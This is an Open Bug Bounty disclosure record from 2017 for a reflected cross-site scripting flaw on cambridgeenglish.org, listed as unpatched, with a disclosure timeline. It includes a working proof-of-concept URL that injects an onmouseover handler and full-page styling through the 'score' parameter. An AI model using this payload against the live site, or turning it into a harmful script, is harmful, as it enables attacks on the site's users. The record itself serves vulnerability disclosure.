cambridgeenglish.org XSS vulnerability

2017-07-06T00:28:00
ID OBB:260570
Type openbugbounty
Reporter Tomy2e
Modified 2017-07-13T01:14:00

Description

Vulnerable URL:
http://www.cambridgeenglish.org/fr/test-your-english/adult-learners/results/?score=%27%20onmouseover=%27alert(%22openbugbounty%22)%27%20style=%27z-index:10;display:block;position:absolute;top:0;left:0;width:100%;height:100%;%27%3eclick%20here&answers=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 02.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 11294
VIP website status:| Yes
cambridgeenglish.org SSL connection grade:| F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 July, 2017 00:28 GMT
Generic security notifications sent to website owner| 6 July, 2017 00:31 GMT
Notification sent to subscribers (without technical details)| 6 July, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 13 July, 2017 01:14 GMT